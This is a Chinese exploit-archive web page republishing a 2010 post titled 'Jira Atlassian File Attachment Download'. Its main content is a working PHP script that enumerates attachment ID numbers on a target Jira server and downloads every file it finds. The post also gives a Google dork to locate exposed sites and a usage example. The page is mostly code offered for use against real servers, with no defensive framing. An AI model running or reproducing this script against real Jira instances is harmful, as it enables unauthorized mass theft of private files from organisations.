首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Jira Atlassian File Attachment Download
来源:Ign.sec gmail com 作者:Ignacio 发布时间:2010-03-31  
=======================================
Jira Atlassian File Attachment Download
=======================================

# Exploit Title: Jira Atlassian
# Date: 28/3/2010
# Author: Ignacio Garrido
# Mail: Ign.sec gmail com
# Software Link: http://www.atlassian.com/software/jira/JIRADownloadCenter.jspa
# Version: 3.X (Maybe 4.X)
# Tested on: Windos & Linux
# Code :
 
<?php
 
/*If it's a https, you MUST especify it on the URL or it won't work.
Try using numbers that you get from your results in google otherwise you will get a lot of 404*/
 
 
echo "\n#########################################################
###################
# \n#Attachment downloader by Scuarplex\n#";
 
if ($argc != 4){echo "
#Usage: php Scuarji.php vulnsite FROM(NUMBER) TO(NUMBER)\n#
#Dork: inurl:/jira/secure/attachment/\n#
#Example: php Scuarji.php http://www.vulnsite/jira/secure/attachment/ 1 12310371#
############################################################################\n";die;}
 
else{
echo "\n#Let's start!\n";
echo "#\n#Ign.sec@Gmail.com\n";
#\n############################################################################\n";}
 
$url2 = $argv[1];
 
if (substr($url2,0,7) != "http://" && substr($url2,0,8) != "https://")
{
$url = ("http://".$url2);
}
else
{
$url = $argv[1];
}
 
if ($argv[2] >= $argv[3])
{
echo "\n\n#The second number must be bigger than the first one\n";
die;
}
 
$numero = $argv[2];
 
for ($numero;$numero <= $argv[3];$numero++)
{
$head = get_headers("$url$numero/");
 
if (substr ($head[0],9,3) == "404")
{
echo "\n#File number $numero not found! (404)\n";
}
else{
$explodeo = explode("filename*=",$head[2]);
$explodeo2 = explode(";",$explodeo[1]);
$archivo = substr($explodeo2[0],7);
 
echo "\n#Downloading file: $archivo\n";
$file=file_get_contents("$url$numero/$archivo");
file_put_contents($archivo,$file);
 
}
}
echo "\n#All attachment downloaded correctly!\n";
die;
 
?>



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Firefox 3.5 Stack Overflow Exp
·Proxomitron 4.5 DOS attack
·Peazip 3.0 DOS attack
·xwine v1.0.1 (.exe file) Local
·RM Downloader 3.0.2.1 (.asx) L
·ASX to MP3 Converter Version 3
·All to All Audio Convertor v2.
·Stud_PE <= v2.6.05 Stack Overf
·Shadow Stream Recorder 3.0.1.7
·Mini-stream Ripper 3.1.0.8 =>
·ASX to MP3 Converter Version 3
·JITed egg-hunter stage-0 shell
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved